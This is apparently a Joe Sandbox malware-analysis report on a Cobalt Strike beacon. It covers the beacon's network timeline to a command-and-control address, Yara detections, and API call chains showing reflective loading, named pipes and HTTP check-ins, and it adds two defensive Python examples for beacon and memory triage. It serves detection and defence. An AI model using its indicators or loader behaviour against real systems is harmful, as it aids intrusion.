                                          Oct 13, 2024 02:00:00.560570955 CEST78105010189.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:01.995090008 CEST501017810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:02.000591993 CEST78105010189.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:02.168920994 CEST78105010189.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:02.168982029 CEST78105010189.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:02.169128895 CEST501017810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:02.169888973 CEST501017810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:02.175359011 CEST78105010189.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:02.283826113 CEST501037810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:02.289258957 CEST78105010389.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:02.289418936 CEST501037810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:02.289716959 CEST501037810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:02.294874907 CEST78105010389.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:02.899909019 CEST78105010389.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:02.899996996 CEST501037810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:03.040719032 CEST78105010389.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:03.040797949 CEST501037810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:03.075722933 CEST501037810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:03.080557108 CEST78105010389.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:04.783369064 CEST501037810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:04.788480997 CEST78105010389.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:04.958766937 CEST78105010389.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:04.958818913 CEST78105010389.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:04.958853006 CEST78105010389.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:04.958966017 CEST501037810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:04.958966017 CEST501037810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:04.959321976 CEST501037810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:04.959570885 CEST501037810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:04.964298010 CEST78105010389.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:04.964596987 CEST501037810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:05.069991112 CEST501057810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:05.075206995 CEST78105010589.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:05.075366020 CEST501057810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:05.075967073 CEST501057810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:05.080782890 CEST78105010589.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:05.681389093 CEST78105010589.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:05.681679010 CEST501057810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:05.813782930 CEST78105010589.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:05.813868999 CEST501057810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:05.814635992 CEST501057810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:05.819480896 CEST78105010589.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:07.266956091 CEST501057810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:07.272206068 CEST78105010589.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:07.439795017 CEST78105010589.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:07.439841032 CEST78105010589.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:07.440172911 CEST501057810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:07.440551043 CEST501057810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:07.445389986 CEST78105010589.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:07.549746037 CEST501077810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:07.554791927 CEST78105010789.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:07.554904938 CEST501077810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:07.555305958 CEST501077810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:07.560122967 CEST78105010789.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:08.156397104 CEST78105010789.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:08.156493902 CEST501077810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:08.292927980 CEST78105010789.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:08.293020010 CEST501077810192.168.2.489.197.154.116
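The timeline shows the beacon opening a fresh TCP session to 89.197.154.116:7810 from consecutive ephemeral ports (50097, 50099, 50101, ...) about every 2.4 seconds, each session lasting well under two seconds. That regular cadence to a non-standard port, rather than any single packet, is what a network detection keys on. The following is an added example, not part of the Joe Sandbox report or of Joe Security's tooling: it parses timeline rows in the column layout above (the sample rows are copied from this report and embedded as a constructed input), groups packets into sessions, and scores each server by the regularity of the session start intervals. The "lower port is the server" heuristic and the well-known-port list are assumptions made for the example.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample input: rows from this report's TCP timeline, one line per
# packet, in the column order timestamp / source port / dest port / source IP / dest IP.
SAMPLE_ROWS = """\
Oct 13, 2024 01:59:55.526273012 CEST 50097 7810 192.168.2.4 89.197.154.116
Oct 13, 2024 01:59:55.667193890 CEST 7810 50097 89.197.154.116 192.168.2.4
Oct 13, 2024 01:59:57.393332958 CEST 50099 7810 192.168.2.4 89.197.154.116
Oct 13, 2024 01:59:57.398797989 CEST 7810 50099 89.197.154.116 192.168.2.4
Oct 13, 2024 01:59:59.784298897 CEST 50101 7810 192.168.2.4 89.197.154.116
Oct 13, 2024 02:00:02.283826113 CEST 50103 7810 192.168.2.4 89.197.154.116
Oct 13, 2024 02:00:05.069991112 CEST 50105 7810 192.168.2.4 89.197.154.116
Oct 13, 2024 02:00:07.549746037 CEST 50107 7810 192.168.2.4 89.197.154.116
"""

ROW_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(?P<ns>\d{9}) \w+ "
    r"(?P<sport>\d+) (?P<dport>\d+) (?P<sip>[\d.]+) (?P<dip>[\d.]+)$"
)
EPOCH = datetime(1970, 1, 1)

# Ports treated as "expected" destinations (assumption for this example).
WELL_KNOWN = {22, 25, 53, 80, 443, 8080}


def parse_rows(text):
    """Yield (seconds, sport, dport, sip, dip) for each timeline row; skip junk lines."""
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        dt = datetime.strptime(m["ts"], "%b %d, %Y %H:%M:%S")
        secs = (dt - EPOCH).total_seconds() + int(m["ns"]) / 1e9
        yield secs, int(m["sport"]), int(m["dport"]), m["sip"], m["dip"]


def session_starts(rows):
    """Map (server_ip, server_port) -> sorted first-packet times, one per TCP session.

    Heuristic: the side with the lower port number is the server, because client
    ports are ephemeral (high). Packets in either direction map to the same key."""
    first_seen = {}
    for secs, sport, dport, sip, dip in rows:
        if dport < sport:
            key = (sip, sport, dip, dport)   # client -> server
        else:
            key = (dip, dport, sip, sport)   # server -> client, flipped
        first_seen[key] = min(secs, first_seen.get(key, secs))
    by_server = defaultdict(list)
    for (_, _, s_ip, s_port), t in first_seen.items():
        by_server[(s_ip, s_port)].append(t)
    return {k: sorted(v) for k, v in by_server.items()}


def beacon_report(text, min_sessions=4, max_cv=0.5):
    """Flag servers receiving regularly spaced sessions on a port outside WELL_KNOWN.

    Regularity is the coefficient of variation (stddev / mean) of the gaps between
    session starts; a Cobalt Strike sleep with low jitter gives a small value."""
    report = {}
    for (ip, port), starts in session_starts(parse_rows(text)).items():
        if len(starts) < min_sessions:
            report[(ip, port)] = {"sessions": len(starts), "beaconing": False}
            continue
        gaps = [b - a for a, b in zip(starts, starts[1:])]
        m, sd = mean(gaps), pstdev(gaps)
        cv = sd / m if m else float("inf")
        report[(ip, port)] = {
            "sessions": len(starts),
            "mean_interval": m,
            "cv": cv,
            "beaconing": cv <= max_cv and port not in WELL_KNOWN,
        }
    return report


if __name__ == "__main__":
    for server, result in beacon_report(SAMPLE_ROWS).items():
        print(server, result)
```

On the sample rows the only server is 89.197.154.116:7810 with six sessions spaced about 2.4 s apart and a coefficient of variation near 0.12, so it is flagged. On real traffic the interval would be the configured beacon sleep, and a jitter setting raises the variation, which is why the threshold is a parameter rather than a constant.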
Target ID: 0
Start time: 19:58:02
Start date: 12/10/2024
Path: C:\Users\user\Desktop\A1E0xfcSNl.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\A1E0xfcSNl.exe"
Imagebase: 0x400000
File size: 328'704 bytes
MD5 hash: F05982B55C7A85B9E71A941FE2295848
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                          • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                          • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                          • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Author: @VK_Intel
                                          • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                          • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                          • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                          • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                          • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Author: @VK_Intel
                                          • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                          • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation: low
Has exited: false
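Every Yara hit above is reported against a memory dump, and the dump name encodes where the matched bytes lived: both beacon hits sit at 0x7B0000 (page protection 0x40) and 0x760000 (page protection 0x20) in regions of type 0x20000, which is private, non-image-backed memory, exactly what a reflectively loaded Beacon looks like. The following is an added example, not part of the report or of Joe Security's tooling, that decodes those names to separate hits in unbacked executable memory from hits in image-backed code. The field layout of the dump name is an assumption made for this example; only the page-protection and region-type fields were checked against the names on this page, and the constants are the standard winnt.h values. The sample hit lines are copied from the list above.

```python
import re

# Page-protection and region-type constants from winnt.h.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTE_MASK = 0xF0  # any of the PAGE_EXECUTE* flags
REGION_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed layout of a Joe Sandbox dump name (assumption for this example; fields
# 5 and 7 were checked against the names in this report, the two unnamed fields
# are not interpreted):
#   <proc idx>.<stage>.<dump id>.<base addr>.<page protection>.<?>.<region type>.<?>.sdmp
DUMP_RE = re.compile(
    r"(?P<proc>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\."
    r"(?P<rtype>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.sdmp"
)
HIT_RE = re.compile(
    r"Rule: (?P<rule>[^,]+), Description: (?P<desc>.*?), "
    r"Source: (?P<src>[^,\s]+), Author: (?P<author>.*)"
)

# Constructed sample input: four of the Yara hit lines from this report.
YARA_HITS = """\
• Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Author: ditekSHen
"""


def parse_dump_name(name):
    """Decode base address, page protection and region type from a dump file name."""
    m = DUMP_RE.fullmatch(name)
    if not m:
        raise ValueError(f"unrecognised dump name: {name}")
    protect = int(m["protect"], 16)
    rtype = int(m["rtype"], 16)
    return {
        "base": int(m["base"], 16),
        "protect_name": PAGE_PROTECT.get(protect & 0xFF, hex(protect)),
        "type_name": REGION_TYPE.get(rtype, hex(rtype)),
        "executable": bool(protect & EXECUTE_MASK),
        "image_backed": rtype == 0x1000000,
    }


def triage(hits_text):
    """Group Yara hits by dump base address and classify the memory each hit lives in."""
    result = {}
    for line in hits_text.splitlines():
        m = HIT_RE.search(line)
        if not m:
            continue
        info = parse_dump_name(m["src"])
        entry = result.setdefault(info["base"], {**info, "rules": []})
        entry["rules"].append(m["rule"].strip())
    for entry in result.values():
        if entry["executable"] and not entry["image_backed"]:
            entry["verdict"] = "unbacked executable memory"   # injected / reflectively loaded
        elif entry["executable"]:
            entry["verdict"] = "image-backed code"            # code of a mapped PE
        else:
            entry["verdict"] = "non-executable data"
    return result


if __name__ == "__main__":
    for base, entry in sorted(triage(YARA_HITS).items()):
        print(f"{base:#x} {entry['protect_name']} {entry['type_name']}: "
              f"{entry['verdict']} ({len(entry['rules'])} rules)")
```

For this sample both dumps come out as unbacked executable memory, the 0x7B0000 region being writable as well as executable. The same parser applied to the main image's section dump (0000000000401000 with region type 01000000) reports MEM_IMAGE, which is the contrast a triage analyst wants: a Cobalt Strike rule firing inside the on-disk image is a packed or embedded payload, while a hit in a private executable region is the decrypted, running Beacon.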


                                            Execution Graph

Execution Coverage: 1.6%
Dynamic/Decrypted Code Coverage: 77.2%
Signature Coverage: 10.9%
Total number of Nodes: 320
Total number of Limit Nodes: 17
execution_graph (interactive view; the node/edge data is condensed here to the API call chains it records)

Loader in the main image (imagebase 0x400000):
  0x4014c0 -> 0x401990 / 0x4019d0: GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, GetTickCount, QueryPerformanceCounter
  0x401180 -> 0x401460: GetStartupInfoA; 0x4011e1: Sleep; 0x40142c: _initterm; 0x401251: SetUnhandledExceptionFilter
  0x401fd0 -> 0x402192: VirtualProtect; 0x401dc0 and 0x401d50: 8 API calls each
  0x4024e0 -> 0x402a80: strncmp; 0x4025c5: RtlAddFunctionTable
  0x40130e: malloc; 0x401340: strlen, malloc, memcpy
  0x403040 -> 0x4017f8: GetTickCount -> 0x402e28 -> 0x401866: CreateThread; 0x403058: SleepEx
    from 0x401866: 0x4017a6 malloc -> 0x4017c8 SleepEx -> 0x401704 CreateFileA -> 0x401762 ReadFile -> 0x401781 CloseHandle -> 0x401595 VirtualAlloc -> 0x4015e8 VirtualProtect, CreateThread
    from 0x401866: 0x4016e6 -> 0x401630 CreateNamedPipeA -> 0x40168f ConnectNamedPipe -> 0x4016a7 WriteFile -> 0x4016c6 CloseHandle

Dynamic / decrypted code (regions around 0x778000 and 0x7b0000-0x7da000):
  0x7788d4 -> 0x779324 -> 0x779455: VirtualAlloc; 0x7796b4 -> 0x77976e: LoadLibraryA
  0x7d9cec -> 0x7d9d36: HeapAlloc; 0x7d1db4: DecodePointer; 0x7d1d18: _getptd_noexit (8 API calls)
  0x7d1b48 -> 0x7d92d0: GetSystemTimeAsFileTime, GetCurrentThreadId, QueryPerformanceCounter, __security_init_cookie; 0x7d19e8: 118 API calls; 0x7c93e0: _DllMainCRTStartup (206 API calls)
  0x7cd4d8 and 0x7cd134: GetCurrentProcess; 0x7cd2ec: GetCurrentProcess, VirtualFree
  0x7bca74 -> 0x7c5fec -> 0x7cf284: malloc (HeapAlloc, DecodePointer); 0x7cf244: HeapFree, realloc, GetLastError; 0x7cff54: GetModuleHandleExW, GetProcAddress, ExitProcess
  0x7cc230 -> 0x7d145c: GetSystemTimeAsFileTime (_time64); 0x7d181c: strtok; 0x7d5844: GetLastError, TlsSetValue, GetCurrentThreadId; 0x7d40a8: TlsGetValue
  0x7bf3c0 -> 0x7bf3da: GetLocalTime; 0x7bf274, 0x7be2a8, 0x7be200, 0x7be248, 0x7be278, 0x7be1e0: htonl
  0x7c5c60: GetACP -> 0x7b1218 -> 0x7b1184: CryptAcquireContextA, CryptReleaseContext; 0x7b10d0: GetSystemTimeAsFileTime, clock
  0x7c5cae: GetTickCount; 0x7bcfa4: CryptAcquireContextA (twice), CryptReleaseContext, GetSystemTimeAsFileTime
  0x7c5cec: GetCurrentProcess -> 0x7c0c64: GetModuleHandleA, GetProcAddress; 0x7cdec8: CheckTokenMembership, FreeSid
  0x7c5e28 -> 0x7c5eb5: GetComputerNameA; 0x7cb47c -> 0x7cb611: GetComputerNameA; 0x7c60e0: 8 API calls
  0x7bf014 -> 0x7bf02f: WSASocketA -> 0x7bf058: WSAIoctl
  0x7d7e20 -> 0x7d8b7c: IsProcessorFeaturePresent; 0x7d3ffc and 0x7d8c50: RtlCaptureContext, RtlLookupFunctionEntry, UnhandledExceptionFilter; 0x7d8b30: UnhandledExceptionFilter (__raise_securityfailure)
  0x7ca8dc: 63 API calls; 0x7ca914: 62 API calls; 0x7cda74: 20 API calls; 0x7d1914: 41 API calls; 0x7d00b4: 44 API calls; 0x7cb0b4: 38 API calls

Control-flow Graph

control_flow_graph for the function at 0x401180 (basic blocks 0x401180 to 0x401490, executed and not-executed blocks shown in the interactive view):
  0x401460: GetStartupInfoA -> 0x401470 (call 0x402e88)
  0x4011e1: Sleep (loop back to 0x4011e9)
  0x401417: call 0x402e90; 0x40142c: _initterm
  0x401490: call 0x402e80; 0x4014ae: call 0x402e60
  0x40124c: call 0x401fd0, SetUnhandledExceptionFilter, call 0x4024e0, call 0x402ef0, call 0x401d40, call 0x402f00
  0x40130e: malloc; 0x401340: strlen, malloc, memcpy (self-loop)
  0x40137b: call 0x401950, call 0x403040 -> 0x4013b4 -> 0x4013c8 -> 0x4013d6
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
                                            • String ID: 0PE$@6E$DCE
                                            • API String ID: 649803965-2430247936
                                            • Opcode ID: 51392e7461e9e07ed7f19d0721189c0bf25b9227d41394980ff0e93a3bc1fca1
                                            • Instruction ID: 7b6093c48930a8ef89593839c944e9f908a2e32032a5f35aeb8b435f34b377a6
                                            • Opcode Fuzzy Hash: 51392e7461e9e07ed7f19d0721189c0bf25b9227d41394980ff0e93a3bc1fca1
                                            • Instruction Fuzzy Hash: 5C71ADB5601B0486EB259F56E89476A33A1B745BCAF84803BEF49673E6DF7CC844C348

                                            Control-flow Graph

                                            APIs
                                            • _snprintf.LIBCMT ref: 007BE725
                                              • Part of subcall function 007CF63C: _errno.LIBCMT ref: 007CF673
                                              • Part of subcall function 007CF63C: _invalid_parameter_noinfo.LIBCMT ref: 007CF67E
                                              • Part of subcall function 007C7B38: _snprintf.LIBCMT ref: 007C7CA5
                                            • _snprintf.LIBCMT ref: 007BE7BD
                                            • _snprintf.LIBCMT ref: 007BE7D4
                                            • HttpOpenRequestA.WININET ref: 007BE818
                                            • HttpSendRequestA.WININET ref: 007BE84A
                                            • InternetQueryDataAvailable.WININET ref: 007BE87A
                                            • InternetCloseHandle.WININET ref: 007BE898
                                              • Part of subcall function 007C2D70: strchr.LIBCMT ref: 007C2DD6
                                              • Part of subcall function 007C2D70: _snprintf.LIBCMT ref: 007C2E0C
                                              • Part of subcall function 007C2C0C: strchr.LIBCMT ref: 007C2C69
                                              • Part of subcall function 007C2C0C: _snprintf.LIBCMT ref: 007C2CB3
                                            • InternetReadFile.WININET ref: 007BE8D4
                                            • InternetCloseHandle.WININET ref: 007BE8F5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _snprintf$Internet$CloseHandleHttpRequeststrchr$AvailableDataFileOpenQueryReadSend_errno_invalid_parameter_noinfo
                                            • String ID: %s%s$*/*
                                            • API String ID: 3536628738-856325523
                                            • Opcode ID: 5c4b2c5719e067ce629add7012f112fb417b911470ce534f4123a2ba84123eb0
                                            • Instruction ID: 00329cffa11bd0f90d5dc0ee30f6ceb416abb5c4c7fb549c31d2c2abd73062ef
                                            • Opcode Fuzzy Hash: 5c4b2c5719e067ce629add7012f112fb417b911470ce534f4123a2ba84123eb0
                                            • Instruction Fuzzy Hash: E0619C32B04B8586EB10DF61E844BEEA765F788B98F40412AEE4D57B59DF7CD50AC700

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Name$ComputerFileModuleUserVersion_snprintfmallocstrrchr
                                            • String ID: %s%s%s
                                            • API String ID: 1671524875-1891519693
                                            • Opcode ID: 40ae984fd8d1d60e03acc18bee9c81741f4638c9dfd0547d5b2d8a001e524837
                                            • Instruction ID: 70b582a96e72c2f25c08df51c883e000ca9fba081ecf088ab0ed7d6d21a338c0
                                            • Opcode Fuzzy Hash: 40ae984fd8d1d60e03acc18bee9c81741f4638c9dfd0547d5b2d8a001e524837
                                            • Instruction Fuzzy Hash: 5B41B42570468487EB08FB22E958BAF6795B789FD4F584128FE5A0BB56CF3CD542C700

                                            Control-flow Graph

                                            control_flow_graph 182 7b1184-7b11c0 CryptAcquireContextA 183 7b11c2-7b11e4 CryptAcquireContextA 182->183 184 7b11e6-7b11f9 call 7e2020 182->184 183->184 185 7b120c-7b1216 183->185 188 7b11fb 184->188 189 7b11fd-7b120a CryptReleaseContext 184->189 188->189 189->185
                                            APIs
                                            • CryptAcquireContextA.ADVAPI32 ref: 007B11B8
                                            • CryptAcquireContextA.ADVAPI32 ref: 007B11DC
                                            • CryptGenRandom.ADVAPI32 ref: 007B11F0
                                            • CryptReleaseContext.ADVAPI32 ref: 007B1204
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Crypt$Context$Acquire$RandomRelease
                                            • String ID: ($Microsoft Base Cryptographic Provider v1.0
                                            • API String ID: 685801729-4046902070
                                            • Opcode ID: 0f7b575704e2efa4e71594adee21552c9336b074ba1ad3f512173577c0e57d68
                                            • Instruction ID: 072a972eb8ecbcb9654d24ef183b777390cc9da47bf4416ae473a25c01891f89
                                            • Opcode Fuzzy Hash: 0f7b575704e2efa4e71594adee21552c9336b074ba1ad3f512173577c0e57d68
                                            • Instruction Fuzzy Hash: 34017536B0578482E710CF69E888799B761F7DCB84F848465C64D83765DF7CD64AC740

                                            Control-flow Graph

                                            control_flow_graph 399 401630-40168d CreateNamedPipeA 400 4016dc-4016e5 399->400 401 40168f-4016a1 ConnectNamedPipe 399->401 401->400 402 4016a3-4016a5 401->402 403 4016c6-4016cf CloseHandle 402->403 404 4016a7-4016c4 WriteFile 402->404 403->400 404->403 405 4016d1-4016da 404->405 405->402
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmp
